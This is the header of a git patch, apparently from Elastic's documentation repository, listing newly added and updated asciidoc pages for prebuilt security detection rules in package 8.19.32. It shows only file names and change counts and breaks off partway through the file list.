From 392d497e4895778a5a7e0ee51d62b7af492358a3 Mon Sep 17 00:00:00 2001 From: tradebot-elastic <178941316+tradebot-elastic@users.noreply.github.com> Date: Tue, 1 Sep 2026 13:55:16 +0000 Subject: [PATCH 1/2] Update latest docs --- ...e-created-with-iam-execution-role.asciidoc | 131 +++++++++ ...ock-guardrail-deleted-or-weakened.asciidoc | 127 ++++++++ ...-19-32-aws-cloudtrail-log-updated.asciidoc | 142 +++++++++ ...-32-aws-cloudwatch-alarm-deletion.asciidoc | 168 +++++++++++ ...aws-cloudwatch-log-group-deletion.asciidoc | 195 +++++++++++++ ...ws-cloudwatch-log-stream-deletion.asciidoc | 184 ++++++++++++ ...9-32-aws-config-resource-deletion.asciidoc | 170 +++++++++++ ...19-32-aws-detective-graph-deleted.asciidoc | 113 ++++++++ ...2-ami-shared-with-another-account.asciidoc | 121 ++++++++ ...s-ec2-ebs-snapshot-access-removed.asciidoc | 169 +++++++++++ ...19-32-aws-ec2-encryption-disabled.asciidoc | 172 +++++++++++ ...work-access-control-list-creation.asciidoc | 137 +++++++++ ...work-access-control-list-deletion.asciidoc | 123 ++++++++ ...19-32-aws-ec2-route-table-created.asciidoc | 131 +++++++++ ...curity-group-configuration-change.asciidoc | 168 +++++++++++ ...r-data-retrieval-for-ec2-instance.asciidoc | 150 ++++++++++ ...19-32-aws-efs-file-system-deleted.asciidoc | 173 +++++++++++ ...ted-then-deleted-by-same-identity.asciidoc | 126 ++++++++ ...ntbridge-rule-disabled-or-deleted.asciidoc | 167 +++++++++++ ...ole-login-via-federation-exchange.asciidoc | 119 ++++++++ ...2-aws-guardduty-detector-deletion.asciidoc | 150 ++++++++++ ...ty-publishing-destination-deleted.asciidoc | 111 +++++++ ...y-threat-intelligence-set-deleted.asciidoc | 110 +++++++ ...on-created-or-default-version-set.asciidoc | 128 ++++++++ ...idc-provider-created-by-rare-user.asciidoc | 178 ++++++++++++ ...ated-access-keys-for-another-user.asciidoc | 208 +++++++++++++ ...isabled-or-scheduled-for-deletion.asciidoc | 180 ++++++++++++ ...y-policy-updated-via-putkeypolicy.asciidoc | 129 +++++++++ ...9-32-aws-lambda-function-deletion.asciidoc | 118 ++++++++ ...pdated-to-allow-public-invocation.asciidoc | 154 ++++++++++ ...on-url-created-with-public-access.asciidoc | 131 +++++++++ ...-layer-added-to-existing-function.asciidoc | 149 ++++++++++ ...2-aws-rds-db-instance-made-public.asciidoc | 188 ++++++++++++ ...ds-db-instance-or-cluster-deleted.asciidoc | 187 ++++++++++++ ...ster-deletion-protection-disabled.asciidoc | 168 +++++++++++ ...hosted-zone-associated-with-a-vpc.asciidoc | 180 ++++++++++++ ...-s3-bucket-configuration-deletion.asciidoc | 168 +++++++++++ ...ion-lifecycle-configuration-added.asciidoc | 189 ++++++++++++ ...ed-to-share-with-external-account.asciidoc | 193 ++++++++++++ ...ket-replicated-to-another-account.asciidoc | 185 ++++++++++++ ...et-server-access-logging-disabled.asciidoc | 148 ++++++++++ ...ws-s3-object-versioning-suspended.asciidoc | 156 ++++++++++ ...il-identity-verified-then-deleted.asciidoc | 137 +++++++++ ...hed-to-iam-entity-by-unusual-user.asciidoc | 130 +++++++++ ...are-protocol-subscription-by-user.asciidoc | 157 ++++++++++ ...ntory-reconnaissance-by-rare-user.asciidoc | 149 ++++++++++ ...ity-api-called-for-the-first-time.asciidoc | 140 +++++++++ ...suspicious-user-agent-fingerprint.asciidoc | 178 ++++++++++++ ...eter-request-with-decryption-flag.asciidoc | 137 +++++++++ ...-19-32-aws-vpc-flow-logs-deletion.asciidoc | 132 +++++++++ ...-waf-access-control-list-deletion.asciidoc | 193 ++++++++++++ ...s-waf-rule-or-rule-group-deletion.asciidoc | 173 +++++++++++ ...t-in-administrator-roles-assigned.asciidoc | 161 ++++++++++ ...infmt-configuration-file-creation.asciidoc | 154 ++++++++++ ...laude-cowork-vm-boot-image-tamper.asciidoc | 144 +++++++++ ...strike-command-and-control-beacon.asciidoc | 137 +++++++++ ...ount-hashes-via-built-in-commands.asciidoc | 160 ++++++++++ ...-elastic-agent-service-terminated.asciidoc | 189 ++++++++++++ ...-alert-followed-by-telemetry-loss.asciidoc | 131 +++++++++ ...scope-for-unusual-user-and-client.asciidoc | 184 ++++++++++++ ...edrive-accessed-by-unusual-client.asciidoc | 185 ++++++++++++ ...-with-unusual-authentication-type.asciidoc | 157 ++++++++++ ...-user-sign-in-with-unusual-client.asciidoc | 256 ++++++++++++++++ ...n-with-unusual-non-managed-device.asciidoc | 147 ++++++++++ ...url-wget-and-piped-to-interpreter.asciidoc | 204 +++++++++++++ ...ync-plugin-registered-and-enabled.asciidoc | 151 ++++++++++ ...e-access-login-by-user-and-source.asciidoc | 129 +++++++++ ...aws-cloudformation-stack-creation.asciidoc | 117 ++++++++ ...value-accessed-in-secrets-manager.asciidoc | 139 +++++++++ ...tsecrets-across-multiple-projects.asciidoc | 152 ++++++++++ ...security-group-ingress-rule-added.asciidoc | 134 +++++++++ ...allation-of-custom-shim-databases.asciidoc | 164 +++++++++++ ...ec-cloud-instance-metadata-access.asciidoc | 141 +++++++++ ...-pod-exec-potential-reverse-shell.asciidoc | 122 ++++++++ ...ve-file-or-credential-path-access.asciidoc | 151 ++++++++++ ...d-exec-with-curl-or-wget-to-https.asciidoc | 127 ++++++++ ...-from-node-or-pod-service-account.asciidoc | 130 +++++++++ ...r-list-with-suspicious-user-agent.asciidoc | 117 ++++++++ ...figmap-access-via-azure-arc-proxy.asciidoc | 163 +++++++++++ ...s-cluster-or-sensitive-namespaces.asciidoc | 109 +++++++ ...linux-clipboard-activity-detected.asciidoc | 121 ++++++++ ...observed-ipsec-nat-traversal-peer.asciidoc | 156 ++++++++++ ...-dga-command-and-control-behavior.asciidoc | 92 ++++++ ...-application-shimming-via-sdbinst.asciidoc | 178 ++++++++++++ ...puter-account-ntlm-relay-activity.asciidoc | 156 ++++++++++ ...ng-from-public-to-private-address.asciidoc | 214 ++++++++++++++ ...ng-via-long-and-unique-subdomains.asciidoc | 196 +++++++++++++ ...vasion-via-boot-time-removal-tool.asciidoc | 206 +++++++++++++ ...ntial-iis-web-shell-file-creation.asciidoc | 164 +++++++++++ ...tion-via-suspicious-child-process.asciidoc | 163 +++++++++++ ...tial-masquerading-as-system32-dll.asciidoc | 237 +++++++++++++++ ...rol-bypass-via-tccdb-modification.asciidoc | 165 +++++++++++ ...rivilege-escalation-via-suid-sgid.asciidoc | 124 ++++++++ ...lation-via-unshare-and-uid-change.asciidoc | 155 ++++++++++ ...tly-issued-on-external-connection.asciidoc | 247 ++++++++++++++++ ...ial-timestomp-in-executable-files.asciidoc | 181 ++++++++++++ ...ecution-followed-by-self-deletion.asciidoc | 151 ++++++++++ ...-rare-connection-to-webdav-target.asciidoc | 157 ++++++++++ ...n-enabled-via-systemsetup-command.asciidoc | 178 ++++++++++++ ...file-downloaded-from-the-internet.asciidoc | 160 ++++++++++ ...-procedure-call-from-the-internet.asciidoc | 158 ++++++++++ ...te-procedure-call-to-the-internet.asciidoc | 166 +++++++++++ ...19-32-sensitive-files-compression.asciidoc | 232 +++++++++++++++ ...haring-activity-from-the-internet.asciidoc | 171 +++++++++++ ...-sharing-activity-to-the-internet.asciidoc | 157 ++++++++++ ...tp-to-the-internet-on-port-26-tcp.asciidoc | 165 +++++++++++ ...g-to-common-persistence-locations.asciidoc | 194 +++++++++++++ ...ssfilecopysender-executed-as-root.asciidoc | 174 +++++++++++ ...cess-of-papercut-server-component.asciidoc | 227 +++++++++++++++ ...reated-in-papercut-server-library.asciidoc | 153 ++++++++++ ...32-suspicious-proc-maps-discovery.asciidoc | 181 ++++++++++++ ...picious-process-execution-by-zoom.asciidoc | 202 +++++++++++++ ...us-reading-of-procfs-syscall-file.asciidoc | 131 +++++++++ ...web-browser-sensitive-file-access.asciidoc | 173 +++++++++++ ...sual-file-creation-via-web-server.asciidoc | 176 +++++++++++ ...twork-computing-from-the-internet.asciidoc | 164 +++++++++++ ...network-computing-to-the-internet.asciidoc | 165 +++++++++++ ...r-potential-sql-injection-request.asciidoc | 243 ++++++++++++++++ .../prebuilt-rules-8-19-32-appendix.asciidoc | 134 +++++++++ .../prebuilt-rules-8-19-32-summary.asciidoc | 268 +++++++++++++++++ ...ebuilt-rules-downloadable-updates.asciidoc | 5 + .../prebuilt-rules-reference.asciidoc | 274 ++++++++++-------- .../prebuilt-rules/rule-desc-index.asciidoc | 41 ++- ...e-created-with-iam-execution-role.asciidoc | 131 +++++++++ ...ock-guardrail-deleted-or-weakened.asciidoc | 14 +- .../aws-cloudtrail-log-updated.asciidoc | 12 +- .../aws-cloudwatch-alarm-deletion.asciidoc | 13 +- ...aws-cloudwatch-log-group-deletion.asciidoc | 14 +- ...ws-cloudwatch-log-stream-deletion.asciidoc | 12 +- .../aws-config-resource-deletion.asciidoc | 12 +- .../aws-detective-graph-deleted.asciidoc | 113 ++++++++ ...2-ami-shared-with-another-account.asciidoc | 11 +- ...s-ec2-ebs-snapshot-access-removed.asciidoc | 11 +- .../aws-ec2-encryption-disabled.asciidoc | 10 +- ...ance-interaction-with-iam-service.asciidoc | 14 +- ...work-access-control-list-creation.asciidoc | 13 +- ...work-access-control-list-deletion.asciidoc | 11 +- .../aws-ec2-route-table-created.asciidoc | 11 +- ...curity-group-configuration-change.asciidoc | 15 +- ...r-data-retrieval-for-ec2-instance.asciidoc | 13 +- .../aws-efs-file-system-deleted.asciidoc | 10 +- ...ted-then-deleted-by-same-identity.asciidoc | 126 ++++++++ ...ntbridge-rule-disabled-or-deleted.asciidoc | 10 +- ...ole-login-via-federation-exchange.asciidoc | 119 ++++++++ .../aws-guardduty-detector-deletion.asciidoc | 10 +- ...ty-publishing-destination-deleted.asciidoc | 111 +++++++ ...y-threat-intelligence-set-deleted.asciidoc | 110 +++++++ ...on-created-or-default-version-set.asciidoc | 11 +- ...s-iam-login-profile-added-to-user.asciidoc | 10 +- ...idc-provider-created-by-rare-user.asciidoc | 11 +- ...ated-access-keys-for-another-user.asciidoc | 15 +- ...isabled-or-scheduled-for-deletion.asciidoc | 11 +- ...y-policy-updated-via-putkeypolicy.asciidoc | 11 +- ...ambda-function-created-or-updated.asciidoc | 10 +- .../aws-lambda-function-deletion.asciidoc | 11 +- ...pdated-to-allow-public-invocation.asciidoc | 11 +- ...on-url-created-with-public-access.asciidoc | 13 +- ...-layer-added-to-existing-function.asciidoc | 11 +- .../aws-rds-db-instance-made-public.asciidoc | 15 +- ...ds-db-instance-or-cluster-deleted.asciidoc | 11 +- ...ster-deletion-protection-disabled.asciidoc | 13 +- .../aws-rds-db-snapshot-created.asciidoc | 10 +- ...hosted-zone-associated-with-a-vpc.asciidoc | 11 +- ...-s3-bucket-configuration-deletion.asciidoc | 11 +- ...ion-lifecycle-configuration-added.asciidoc | 11 +- ...ed-to-share-with-external-account.asciidoc | 13 +- ...ket-replicated-to-another-account.asciidoc | 13 +- ...et-server-access-logging-disabled.asciidoc | 11 +- ...ws-s3-object-versioning-suspended.asciidoc | 11 +- ...il-identity-verified-then-deleted.asciidoc | 137 +++++++++ ...hed-to-iam-entity-by-unusual-user.asciidoc | 130 +++++++++ ...are-protocol-subscription-by-user.asciidoc | 15 +- ...ntory-reconnaissance-by-rare-user.asciidoc | 10 +- ...ity-api-called-for-the-first-time.asciidoc | 11 +- ...suspicious-user-agent-fingerprint.asciidoc | 7 +- ...eter-request-with-decryption-flag.asciidoc | 13 +- .../aws-vpc-flow-logs-deletion.asciidoc | 13 +- ...-waf-access-control-list-deletion.asciidoc | 11 +- ...s-waf-rule-or-rule-group-deletion.asciidoc | 11 +- ...t-in-administrator-roles-assigned.asciidoc | 17 +- ...infmt-configuration-file-creation.asciidoc | 154 ++++++++++ ...laude-cowork-vm-boot-image-tamper.asciidoc | 144 +++++++++ ...strike-command-and-control-beacon.asciidoc | 10 +- ...ount-hashes-via-built-in-commands.asciidoc | 3 +- .../elastic-agent-service-terminated.asciidoc | 46 ++- ...-alert-followed-by-telemetry-loss.asciidoc | 6 +- ...scope-for-unusual-user-and-client.asciidoc | 82 ++++-- ...edrive-accessed-by-unusual-client.asciidoc | 39 ++- ...-with-unusual-authentication-type.asciidoc | 55 ++-- ...-user-sign-in-with-unusual-client.asciidoc | 29 +- ...n-with-unusual-non-managed-device.asciidoc | 7 +- ...url-wget-and-piped-to-interpreter.asciidoc | 204 +++++++++++++ ...ync-plugin-registered-and-enabled.asciidoc | 3 +- ...e-access-login-by-user-and-source.asciidoc | 129 +++++++++ ...aws-cloudformation-stack-creation.asciidoc | 11 +- ...value-accessed-in-secrets-manager.asciidoc | 11 +- ...tsecrets-across-multiple-projects.asciidoc | 152 ++++++++++ ...security-group-ingress-rule-added.asciidoc | 11 +- ...allation-of-custom-shim-databases.asciidoc | 6 +- ...ec-cloud-instance-metadata-access.asciidoc | 10 +- ...-pod-exec-potential-reverse-shell.asciidoc | 15 +- ...ve-file-or-credential-path-access.asciidoc | 12 +- ...d-exec-with-curl-or-wget-to-https.asciidoc | 18 +- ...-from-node-or-pod-service-account.asciidoc | 10 +- ...r-list-with-suspicious-user-agent.asciidoc | 13 +- ...figmap-access-via-azure-arc-proxy.asciidoc | 12 +- ...s-cluster-or-sensitive-namespaces.asciidoc | 6 +- ...linux-clipboard-activity-detected.asciidoc | 8 +- ...observed-ipsec-nat-traversal-peer.asciidoc | 156 ++++++++++ ...-dga-command-and-control-behavior.asciidoc | 7 +- ...-application-shimming-via-sdbinst.asciidoc | 4 +- ...puter-account-ntlm-relay-activity.asciidoc | 9 +- ...ng-from-public-to-private-address.asciidoc | 214 ++++++++++++++ ...ng-via-long-and-unique-subdomains.asciidoc | 196 +++++++++++++ ...vasion-via-boot-time-removal-tool.asciidoc | 206 +++++++++++++ ...ntial-iis-web-shell-file-creation.asciidoc | 164 +++++++++++ ...tion-via-suspicious-child-process.asciidoc | 163 +++++++++++ ...tial-masquerading-as-system32-dll.asciidoc | 4 +- ...rol-bypass-via-tccdb-modification.asciidoc | 3 +- ...rivilege-escalation-via-suid-sgid.asciidoc | 16 +- ...lation-via-unshare-and-uid-change.asciidoc | 3 +- ...tly-issued-on-external-connection.asciidoc | 247 ++++++++++++++++ ...ial-timestomp-in-executable-files.asciidoc | 18 +- ...ecution-followed-by-self-deletion.asciidoc | 151 ++++++++++ .../rare-connection-to-webdav-target.asciidoc | 13 +- ...mote-file-download-via-powershell.asciidoc | 6 +- ...n-enabled-via-systemsetup-command.asciidoc | 3 +- ...file-downloaded-from-the-internet.asciidoc | 7 +- ...-procedure-call-from-the-internet.asciidoc | 6 +- ...te-procedure-call-to-the-internet.asciidoc | 6 +- .../sensitive-files-compression.asciidoc | 3 +- ...haring-activity-from-the-internet.asciidoc | 9 +- ...-sharing-activity-to-the-internet.asciidoc | 6 +- ...tp-to-the-internet-on-port-26-tcp.asciidoc | 6 +- ...g-to-common-persistence-locations.asciidoc | 194 +++++++++++++ ...ssfilecopysender-executed-as-root.asciidoc | 174 +++++++++++ ...cess-of-papercut-server-component.asciidoc | 227 +++++++++++++++ ...reated-in-papercut-server-library.asciidoc | 153 ++++++++++ .../suspicious-proc-maps-discovery.asciidoc | 6 +- ...picious-process-execution-by-zoom.asciidoc | 202 +++++++++++++ ...us-reading-of-procfs-syscall-file.asciidoc | 131 +++++++++ ...web-browser-sensitive-file-access.asciidoc | 3 +- ...sual-file-creation-via-web-server.asciidoc | 13 +- ...unusual-parent-child-relationship.asciidoc | 16 +- ...twork-computing-from-the-internet.asciidoc | 6 +- ...network-computing-to-the-internet.asciidoc | 6 +- ...r-potential-sql-injection-request.asciidoc | 7 +- docs/index.asciidoc | 2 + 248 files changed, 24539 insertions(+), 619 deletions(-) create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-agentcore-resource-created-with-iam-execution-role.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-bedrock-guardrail-deleted-or-weakened.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudtrail-log-updated.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-alarm-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-group-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-cloudwatch-log-stream-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-config-resource-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-detective-graph-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ami-shared-with-another-account.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-ebs-snapshot-access-removed.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-encryption-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-network-access-control-list-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-route-table-created.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-security-group-configuration-change.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ec2-user-data-retrieval-for-ec2-instance.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-efs-file-system-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eks-access-entry-created-then-deleted-by-same-identity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-eventbridge-rule-disabled-or-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-getfederationtoken-followed-by-console-login-via-federation-exchange.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-detector-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-publishing-destination-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-guardduty-threat-intelligence-set-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-customer-managed-policy-version-created-or-default-version-set.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-oidc-provider-created-by-rare-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-iam-user-created-access-keys-for-another-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-kms-key-policy-updated-via-putkeypolicy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-policy-updated-to-allow-public-invocation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-function-url-created-with-public-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-lambda-layer-added-to-existing-function.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-made-public.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-configuration-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-replicated-to-another-account.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-bucket-server-access-logging-disabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-s3-object-versioning-suspended.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-email-identity-verified-then-deleted.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sns-rare-protocol-subscription-by-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-suspicious-user-agent-fingerprint.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-vpc-flow-logs-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-access-control-list-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-aws-waf-rule-or-rule-group-deletion.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-azure-rbac-built-in-administrator-roles-assigned.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-binfmt-configuration-file-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-claude-cowork-vm-boot-image-tamper.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-cobalt-strike-command-and-control-beacon.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-dumping-account-hashes-via-built-in-commands.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-agent-service-terminated.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-elastic-defend-alert-followed-by-telemetry-loss.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-oauth-user-impersonation-scope-for-unusual-user-and-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-sharepoint-or-onedrive-accessed-by-unusual-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-authentication-type.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-client.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-finder-sync-plugin-registered-and-enabled.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-aws-cloudformation-stack-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-insecure-aws-ec2-vpc-security-group-ingress-rule-added.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-installation-of-custom-shim-databases.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-cloud-instance-metadata-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-potential-reverse-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-sensitive-file-or-credential-path-access.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-pod-exec-with-curl-or-wget-to-https.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-from-node-or-pod-service-account.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-get-or-list-with-suspicious-user-agent.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secret-or-configmap-access-via-azure-arc-proxy.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-kubernetes-secrets-list-across-cluster-or-sensitive-namespaces.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-linux-clipboard-activity-detected.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-newly-observed-ipsec-nat-traversal-peer.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-possible-fin7-dga-command-and-control-behavior.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-application-shimming-via-sdbinst.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-computer-account-ntlm-relay-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-rebinding-from-public-to-private-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-dns-tunneling-via-long-and-unique-subdomains.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-evasion-via-boot-time-removal-tool.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-iis-web-shell-file-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-java-service-exploitation-via-suspicious-child-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-potential-masquerading-as-system32-dll.asciidoc create mode 100644 